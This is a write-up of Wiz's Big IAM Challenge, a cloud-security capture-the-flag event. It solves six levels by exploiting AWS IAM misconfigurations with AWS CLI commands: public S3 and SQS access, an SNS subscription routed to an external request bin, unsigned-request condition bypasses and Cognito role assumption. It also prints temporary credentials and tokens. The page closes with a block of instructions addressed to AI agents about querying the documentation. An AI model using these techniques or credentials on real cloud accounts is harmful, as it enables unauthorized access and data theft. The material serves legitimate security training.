# Big IAM Challenge
The [**The Big IAM Challenge**](https://bigiamchallenge.com/) is a cloud security Capture The Flag (CTF) event organize by Wiz with the goal of identifying and and exploiting AWS IAM misconfigurations, and learn from real-world scenarios.
[Start Challenge](https://bigiamchallenge.com/)
***
## Level 1: Buckets of Fun
IAM Policy
{% code overflow="wrap" %}
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
}
}
}
]
}
```
{% endcode %}
Solve
We can see that ased on the IAM Policy, the principal `"*"` is given the `Allow` effect on theAction`s3:ListBucket and s3:GetObject` with the scope of `thebigiamchallenge-storage-9979f4b`
This means that any public user is able to access the bucket and download file from it
{% code overflow="wrap" %}
```
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53 37 flag1.txt
2023-06-08 19:18:24 81889 logo.pngaws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
```
{% endcode %}
In fact, we are able to annoymously access it, even without the preconfigured aws account on the iam challenge website.
```
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt - --no-sign-request
{wiz:exposed-storage-risky-as-usual}
```
Reference:
***
## Level 2: ~~Google~~ Analytics
IAM Policy
{% code overflow="wrap" %}
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:SendMessage",
"sqs:ReceiveMessage"
],
"Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
}
]
}
```
{% endcode %}
Solve
Since the challenge says it uses tthe analytics sysem on this website, I viewed page source, and managed to get the queue URL. However, we are also able to manually recreate the SQS Queue URL as we have enough information within the IAM Policy.
```
// Initialize the Amazon Cognito credentials provider
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: 'us-east-1:c6f3eb2e-3cb5-404e-93bc-f0bdf7ad042e'});
// Set the region
AWS.config.update({region: 'us-east-1'});
// Create an SQS service object for Web Analytics.
// Log trafic from all users into SQS.
var sqs = new AWS.SQS({apiVersion: '2012-11-05'});
var params = {
DelaySeconds: 0,
MessageBody: JSON.stringify({"URL": document.location.href, "User-Agent": navigator.userAgent, "IsAdmin": false}),
QueueUrl: "https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2"
};
sqs.sendMessage(params, function(err, data) {
if (err) {
console.log("Error", err);
} else {
console.log("Success", data.MessageId);
}
});
```
Next, I try and receive-message and was able ot get the flag.
{% code overflow="wrap" %}
```json
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
"Messages": [
{
"MessageId": "97659e07-7a6f-4feb-a1f6-c82b59c5f98b",
"ReceiptHandle": "AQEBqt1TrGkiw0s9ks5CLMSvaXhrfInB3poMtpTzdS4CevOTikTEwKpGWf3IMQGlBX7S4qVIHVCX1HJQg8p+mahrsva2UBZhbPPVVCe8wfzhLUuAoo2MAyLuQRbHHlBdZ0gT0l3Zi5bTIpl1qn2/TAP9jYJXfZ
wbDEnqY1EKCjE0nTXOYzeyI3ALdAqq3Kr6L3IvlAsUZtxSExO/TKDUKtlmTi09Pawp9vAxag304lEM30sxdRY0y/rdadgrlEfo1tb218gWaZieBGftY8sYyrk0xN7YHO68C7vxIVtGUEUm8kZNNL4BRBtNvsbeOrG4zaHwuXptW0ZNK89fGchnOMfWad
X8RZ1abLdARxsvXQqH77maGPNSfrT+sH5/4ayFXkaJv8CC6eViIepOkwRq9c+d3iZl2VJev8DpNDcHRcjbUH4=",
"MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
"Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\",
\"IsAdmin\": true}"
}
]
}
```
{% endcode %}
Based on the meswsage body, theres a URL, and going to the URL gives us the flag.
{% code overflow="wrap" %}
```
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
```
{% endcode %}
Flag: `{wiz:you-are-at-the-front-of-the-queue}`
Reference:
***
## Level 3: Enable Push Notifications
IAM Policy
```json
{
"Version": "2008-10-17",
"Id": "Statement1",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Condition": {
"StringLike": {
"sns:Endpoint": "*@tbic.wiz.io"
}
}
}
]
}
```
Based on the aws cli reference page for sns subscribe. Note that theres a wild card reference for the `sns:Endpoint` allowing us to point it to any site we control as long as it ends with `"@tbic.wiz.io"`
{% code overflow="wrap" %}
```
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint https://enkcp8aoixerj.x.pipedream.net/asd@tbic.wiz.io
```
{% endcode %}
In the requestbin output, theres a subscribe url.
Visiting the URL gives us a confirmation response that we have subscribed to the topic.
```xml
arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications:80e4c88f-2a79-4a0a-8051-bd883b77056a0c20196b-7331-5957-9e2c-476809be1a7a
```
And we succesfully gotten the flag from our request bin.
Flag: `{wiz:always-suspect-asterisks}`
Reference:
***
## Level 4: Admin Only
IAM Policy
```
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
},
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
}
}
}
]
}
```
At a glance, the IAM Policy seems secure, that it scoped to only allow if the `aws:PrincipalArn` is the arn of the admin account. However, the vulnerabiliy comes in the `ForAllValues` which will return true if there are no context key in the requests.
We can simply run the s3 command with `no-sign-requests` to ensure that the `PrincipalArn` is not being sent in the request and able to retrieve the flag.
{% code overflow="wrap" %}
```
> aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43 42 flag-as-admin.txt
2023-06-08 19:20:01 81889 logo-admin.png
> aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - --no-sign-request
{wiz:principal-arn-is-not-what-you-think}
```
{% endcode %}
Flag: `{wiz:principal-arn-is-not-what-you-think}`
Reference:\
***
## Level 5: Do I know you?
IAM Policy
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"mobileanalytics:PutEvents",
"cognito-sync:*"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::wiz-privatefiles",
"arn:aws:s3:::wiz-privatefiles/*"
]
}
]
}
```
Recalling from previous level, there were some cognito credentials in the browser javascript. I viewed the page source and we can see something similar.
{% code overflow="wrap" %}
```javascript
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
// Set the region
AWS.config.update({region: 'us-east-1'});
$(document).ready(function() {
var s3 = new AWS.S3();
params = {
Bucket: 'wiz-privatefiles',
Key: 'cognito1.png',
Expires: 60 * 60
}
signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
$('#signedImg').attr('src', url);
});
});
```
{% endcode %}
The browser gets a cognito identity credentials from the id pool, and use it to retrieve the file `cognito1.png` using s3 presigned url, which we can see in the browser source. when inspecting element.
Since the `AWS.config.credentials` is being created by javascript, we can just run the browser console to retrieve the credentials.
With the credentials we are able to then access the AWS S3 bucket normally using AWS CLI.
```
{
"AccessKeyId": "ASIARK7LBOHXOZC6UC63",
"SecretKey": "XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4",
"SessionToken": "IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJIMEYCIQCyIRjUgrnBcZgXvvb3Pd36y5K79sRmxYXk9uOytJ2ZNgIhAPbBI8HURFpwF+9OIkjldiQ6B27KtRT5k9yzT4m3CM6XKskFCHYQABoMMDkyMjk3ODUxMzc0IgygwcuHwXUiG/4Az3UqpgVJrklNqZm09uSXrroAQ4ZS0+Cn4wH1pQYDdQ1AMtDExbROvVnnWJyFvdgZceUa6dP8QiL6m128BzqxXUNUjOM2CFO9N3R9KO8FLMxm0flqYbgZhrVlnuqTHztLmvowzagk2dKTE03vAtFL+1FWhETuM5TgoKtQeY8OUBQrEDDTlhvz03hFRF6muF2Mx1e1e1NJtK1VuQYEs/7OOCUMiEgXnAGENZKJgbaW+g168wXudYOH1L7Qt1bQePmqsu1Fx8AMDklLfMwcPqPWQPBAMTodEUIWA77pKHB8pqjNQEW0HDRJp2KzfvbkdpRWvU6ALIhu1pcNLM1O4TisdoCNdcppbolo+Iv4QgspButBpWfjAc1FzHI6WMDIIy3xoaWuc21k+CaVpBNpYnIGzZny6amI2cE7GddR6LSL9dhCXSE6DukvYVGr9YmXYnFqJFH3nsCRU+sG14URYoHsWPKfS9/gxHjT1G0IdQ6ehdUrE4XMSwHL92p0nIdrBhJz3ZwnHKiYePT92KEP9nKGQj8X2EW2YteWpzmPh+roVsqqxrJFFsucCQ19oPZx0iI3NKmgjweSvK94Hh6WKjPYzsKZwguhRo3WKRH7RfEliRat+KYN4jtlHeBMY/PYWtO+XohvBMPyjihAOan38d+D/NWiSfRzGtxHhaVwcB3Ls6YPd6fk1nOdTlAH8NcgOJ+cJM4oQGVRrgjtMdftrFNrLZhIIL666WyWXDt1yPb9sUj8v8dA8VRHq10+6aC4s2+3vTRYQYGnmrU7+DRZQURM1ZdEd6DoACrOsdX7kT6qXtnvBNl9apoFdXEgp5Qkqfxy9/Km+mvYZbowJAtqEv2LYrO+PE1wx+VE58Nmm/OQhHHsprb37mDNSlqBaLrg4wmyisW4REqV/pIBjxYw9YGmrAY63AJt9jE+06aJVTloN+lhDGH2nG5HJmPeDt2zebkK4DKNK8NKugfapAmYXYghTvbDffbC/4Zo3OQ8y0zNanbay/OfgQFvOFhhNku/R6/iE2s4gpoGLBfHVkGdSFbAdfZiWqbVWfqUWOxgZMRyGlwFZhLvrD03sSH7m1+GVlHoioC8i1Cm9GO8sp0kVN+8Dqzu4qOQ6QLvHWH7tax872RWaWI2lX56OY9cvHXCqe2NveVaOF8vNdDWGb/iNsJWGnJ8j8rrqkT3n/ZjwHUknBefr6xpuhaMh4QQCvn8VofSTcJUCNZQSpZEtkBqfiKAza5XDo3UC940/8BiX0XoDTjse7lXyMhqG0I+v+pLjv4Ue5IsbLV20P+3dQZKSPF4b+EuGKkuyF5C1PfpsqMy8wYEVVPLtGW0Zugc0TXeCZ8Jr1vd9hzzwbqV7AKGJ2SApD2aYQO1NQrBbgTV3Gx0N8U=",
"Expiration": "2023-12-25T14:17:41.000Z"
}
```
I tried to run `aws configure` to configure the account, but as we are in a read only file system, I was not able to create the `.aws/credentials` file. So I just exported them to environment variable, and tried to retrieve the flag
```
> export aws_access_key_id="ASIARK7LBOHXOZC6UC63"
> export aws_secret_access_key=XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4
> export aws_session_token="IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJIMEYCIQCyIRjUgrnBcZgXvvb3Pd36y5K79sRmxYXk9uOytJ2ZNgIhAPbBI8HURFpwF+9OIkjldiQ6B27KtRT5k9yzT4m3CM6XKskFCHYQABoMMDkyMjk3ODUxMzc0IgygwcuHwXUiG/4Az3UqpgVJrklNqZm09uSXrroAQ4ZS0+Cn4wH1pQYDdQ1AMtDExbROvVnnWJyFvdgZceUa6dP8QiL6m128BzqxXUNUjOM2CFO9N3R9KO8FLMxm0flqYbgZhrVlnuqTHztLmvowzagk2dKTE03vAtFL+1FWhETuM5TgoKtQeY8OUBQrEDDTlhvz03hFRF6muF2Mx1e1e1NJtK1VuQYEs/7OOCUMiEgXnAGENZKJgbaW+g168wXudYOH1L7Qt1bQePmqsu1Fx8AMDklLfMwcPqPWQPBAMTodEUIWA77pKHB8pqjNQEW0HDRJp2KzfvbkdpRWvU6ALIhu1pcNLM1O4TisdoCNdcppbolo+Iv4QgspButBpWfjAc1FzHI6WMDIIy3xoaWuc21k+CaVpBNpYnIGzZny6amI2cE7GddR6LSL9dhCXSE6DukvYVGr9YmXYnFqJFH3nsCRU+sG14URYoHsWPKfS9/gxHjT1G0IdQ6ehdUrE4XMSwHL92p0nIdrBhJz3ZwnHKiYePT92KEP9nKGQj8X2EW2YteWpzmPh+roVsqqxrJFFsucCQ19oPZx0iI3NKmgjweSvK94Hh6WKjPYzsKZwguhRo3WKRH7RfEliRat+KYN4jtlHeBMY/PYWtO+XohvBMPyjihAOan38d+D/NWiSfRzGtxHhaVwcB3Ls6YPd6fk1nOdTlAH8NcgOJ+cJM4oQGVRrgjtMdftrFNrLZhIIL666WyWXDt1yPb9sUj8v8dA8VRHq10+6aC4s2+3vTRYQYGnmrU7+DRZQURM1ZdEd6DoACrOsdX7kT6qXtnvBNl9apoFdXEgp5Qkqfxy9/Km+mvYZbowJAtqEv2LYrO+PE1wx+VE58Nmm/OQhHHsprb37mDNSlqBaLrg4wmyisW4REqV/pIBjxYw9YGmrAY63AJt9jE+06aJVTloN+lhDGH2nG5HJmPeDt2zebkK4DKNK8NKugfapAmYXYghTvbDffbC/4Zo3OQ8y0zNanbay/OfgQFvOFhhNku/R6/iE2s4gpoGLBfHVkGdSFbAdfZiWqbVWfqUWOxgZMRyGlwFZhLvrD03sSH7m1+GVlHoioC8i1Cm9GO8sp0kVN+8Dqzu4qOQ6QLvHWH7tax872RWaWI2lX56OY9cvHXCqe2NveVaOF8vNdDWGb/iNsJWGnJ8j8rrqkT3n/ZjwHUknBefr6xpuhaMh4QQCvn8VofSTcJUCNZQSpZEtkBqfiKAza5XDo3UC940/8BiX0XoDTjse7lXyMhqG0I+v+pLjv4Ue5IsbLV20P+3dQZKSPF4b+EuGKkuyF5C1PfpsqMy8wYEVVPLtGW0Zugc0TXeCZ8Jr1vd9hzzwbqV7AKGJ2SApD2aYQO1NQrBbgTV3Gx0N8U="
```
However, when runnning `env` we can clearly see that the session token wasnt being modified.
So lets spin up a virtual machine and use it to get the flag.
```
aws configure --profile level5
AWS Access Key ID [None]: ASIARK7LBOHXOZC6UC63
AWS Secret Access Key [None]: XnKcOsg32TtUbawDXNx24UDA91NnUcm8SbdtBik4
Default region name [None]:
Default output format [None]: us-west-1
aws s3 ls s3://wiz-privatefiles --profile level5
2023-06-06 03:42:27 4220 cognito1.png
2023-06-05 21:28:35 37 flag1.txt
aws s3 cp s3://wiz-privatefiles/flag1.txt - --profile level5
{wiz:incognito-is-always-suspicious}
```
Flag: `{wiz:incognito-is-always-suspicious}`
***
## Level 6: One final push
IAM Policy
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
```
First, lets figure out what Cognito Identitty really does, as I cheesed level 5 with the credentials from the browser javascript console.
Cognito Federated Identities allow scoped temporary credentials to untrusted environment. Doing further research
First, we will need to get the cognito id, based on the `identity-pool-id` which is given in the IAM Policy with the [`aws get-id`](https://docs.aws.amazon.com/cli/latest/reference/cognito-identity/get-id.html) commands.
```
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
"IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958"
}
```
With the `IdentityId` we are then able to get a set of credentials to use. What we doing here is what the JavaScript code at Level5 does.
```
aws cognito-identity get-credentials-for-identity --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1
{
"IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXMQM5YB74",
"SecretKey": "r2RYZLdvtX3x88t/OJLScFeyKtJtqMECwTzrhlIT",
"SessionToken": "IQoJb3JpZ2luX2VjEO7//////////wEaCXVzLWVhc3QtMSJHMEUCIA5nWZcHrI9vtOsT+Hmuk5LwKbSRsbfUsYegGkqD5dGgAiEA8Zh3CHqRHTmLqZbB7rkrAWUvNoZ9imytigShi/h4V0sqyQUIdxAAGgwwOTIyOTc4NTEzNzQiDLgKYDNiCTAAA6B6sSqmBZLtfuLVSd5jAzr9qxANPiYziD3rdq6Gp4P0a/o6hrFvrjNgiDEUxsiml5t+f5/NYAJ29ML5L/EPSgb6sONJEFlio5+FSvIK7/Er2NDMsJfM0cmRLh3nF5Qh/xwAZYHiarIh5FVYHp5cPcx49A5ZVPv++eCP5tjQcfYh+KBf5FuphRp5Qtk7eOxkfApg4PIpu8VYBDffBaR81hQbhr7SQzigWCFwLokPNALJeV2rY5njQSP54nQcQbv/fEBPYb4dZR0Qu1uEOZAkfuRTLetBObnQ1hiSPJFI9om7VFe9Px5UfY5m6VaydJGYvDphe8mmcIzkABlprq4IKlj9mWf09oB8HCbO50vvI+y1kR0IklcXIt96iGqNy3lanxKrbLisDfPhDX2NFjUB0JaUext+HsyEcegHecrDlNYgxSVxsRwl7/4o/2lV6iUT237N4JHS8tUrftD8Gxt7jDYa8OmeKyIeViPGAUldTMXAc7mUgptxpLA3KC7kGtVbOtWF4lWzZq0lS36sOC48erfNzFmpynaYLJs8+El+hHCoWDnp1pDvJ4JA8RMOEVtTYc1v63ruXnP4XXu/kRme2ordTFxS7NrOr663lJN9rXpI2ZWz4KXl5iXfcOTGuyK5sXNEzQCvgz39JCMfVsVfnUOsNPf6Z/VfNbIzoo7aJ54nobduO0gohzZ+ERtuVj05FFbJZrTVu8l0peTmHe5QCfL/30D8zCZ7cFjRYPrugl2MmzND2tYQYNfOt4Jw88rESn07waB9irryKq5oKKyIp2yNii3kTwODldWm+KYVVx7pDjrpBj7a5u4By0EujiITJJSMie2dwoV/FjzdaIXOthT6tVF48BAODSR+2TCxPnGt6qqKwopWRUeqqwkBMiX7tNYoO6KL5ymdEqJ+eTC3jKasBjrdAs6AFV1JepywRjAWyHFgD43kIy/G/3PuvCmim63frO73SfmhJbke7/CyzrM0bKFIILPgHoeGAtealkI7NrHm8FT2onqMQB7hZGtday97r1Qb9mJlzgfv7HMJtnZRvBb0QvAh61uXHwf1181CJpuPojTLEs+HwHzvQaiU2dIh+ZwcKolx/5tAb+ayc3yUrDL5Smb3sU54FaFaDEvlZMZtNb870AVpG1PWwvEY6cpfc+FusjQT992Xh8gxX1oESATikYrkfTa+WID6ogPeUJdY/exTb1V3dEUa1/FqxDTe82/qWKnU5pKZXbDLujsdWBvmFqopTR7Tg1Rd3/+noVs+x5MPeAqvrAsaZ6vdpKdX3wKZlwfjpymMWqiZhh+JUVW8+qzC13i6u16zs3Xyhz2K2r8SXqMd/YdMLTGHjRfTC+e/H7FTTAzUEFQsae3V+bVSTMjEpcOKyISjyq50C58=",
"Expiration": "2023-12-25T22:40:07+08:00"
}
}
```
Now, we just need to asssume the role and get the flag. However, we need an OAuth 2.0 or OCID token to run the `assume-role-with-web-identity` command. Doing further enumeration shows the `aws cognito-identity get-open-id-token` commands which returns a OpenID Token.
{% code overflow="wrap" %}
```
aws cognito-identity get-open-id-token --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1
{
"IdentityId": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
"Token": "eyJraWQiOiJ1cy1lYXN0LTE0IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6NDQ0Y2YzYzUtYjdjMS00ZjA1LTlmZTAtOWM0NDUwY2NkOTU4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MDM1MTMxNTMsImlhdCI6MTcwMzUxMjU1M30.H_F1noIBphPlyJzTEDrlrNu0DBQuZ1LppAwHis-Wglpc8essRw3QL-OjTQhdD50u2ziizdK9jvjvsOc5lTIHoih8tooIdGTMZipgUPHLwIEqXyMEdQwkMV4FgPY4igPCoBGTcZykaUoOopCy6sQAf2X0AqCItKrgKZiPPxgeTlpGugLdc6Ygsji3IVi0DIGpJR78aOEnRuY9KpEp6iq-0G0s0Fc6PFw8UxHukS65WUD0-avGoFgAqIUWb_lBo0zT23LmcuAKefykH4B13-EzSzPTjDYcpgHMI8or--6ffRZ4UuQ7czvX_BZ6fR8U0V5XqkaLV7yhoj4Pk8QRtJ-Qrw"
}
```
{% endcode %}
Now, we just need to assume the roie with the OpenID Token..
{% code overflow="wrap" %}
```json
TOKEN=$(aws cognito-identity get-open-id-token --identity-id us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958 --region us-east-1 | jq '.Token' | tr -d '"')
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name something --web-identity-token $TOKEN
{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXFJ65BTNL",
"SecretAccessKey": "t9uP1qLE5SKGRLCOrr9S45kUWY7+sjfZLpxSbRHE",
"SessionToken": "FwoGZXIvYXdzEP///////////wEaDF0vM/GAyYNw3JzReyKhAgxxe0izuWhGTIjRgNzJz90wI52Gw+uv9GukhScmTU5Zz8BZCznhAxkRxkMoAL6jgZ8Q7V3NhWYYOyLlrY825Q+eb8PdsEa+6YDdGaf05oSCiVEKh/sOKbpduW/3lAbyEToePau1ovWnh62e9pZiSB0Ifxuwe9XTtfYweUJUGCG6614XVgILpbxrE/6iV9l/73YYodu2b2ElwlCeKyYxoUiB0EK+8K6Wi0hxpmwVclLW0CqzQSCY8GAWfod0dwXDWJi86R779ufmsV6PQYMBq+4ajZotdbt4kh2B9Qo8uKfdJlG+Cwf7ooFEKuizhsOWYfPKnMUUGlg8DggH5uqgpfAs166kY//a7fIAnOOV29/m7ZDZNPkv9Szt4i9zNSRTDPwokpamrAYylgHJ9GZhFKCt+St+TwNla9IiXVJCYlytmio3HNVdwXnVKoRTc6NZg+NC2wz1RicZ1xmQVSuFCq+alAnd7Z3Uej1j02xSDi3uLEmvjxo+3sh7G8r16/Pnsmrs8iIVxUXHbVW1ugMLCvQWCa6yT1+4p4+bNnQ29n+nolBhKW8Po9Nvv/XaqGGVV6By8yxkvAYZu0Mdc536B1g=",
"Expiration": "2023-12-25T15:00:50+00:00"
},
"SubjectFromWebIdentityToken": "us-east-1:444cf3c5-b7c1-4f05-9fe0-9c4450ccd958",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:something",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/something"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
```
{% endcode %}
Now with the assumed role credentials, we are able to then authenticate and get the flag.
```
aws s3 ls --profile level6
2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000
aws s3 ls s3://wiz-privatefiles-x1000 --profile level6
2023-06-06 03:42:27 4220 cognito2.png
2023-06-05 21:28:35 40 flag2.txt
aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt - --profile level6
{wiz:open-sesame-or-shell-i-say-openid}
```
Reference:
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://kabinet.gitbook.io/ctf-writeup/2023/big-iam-challenge.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.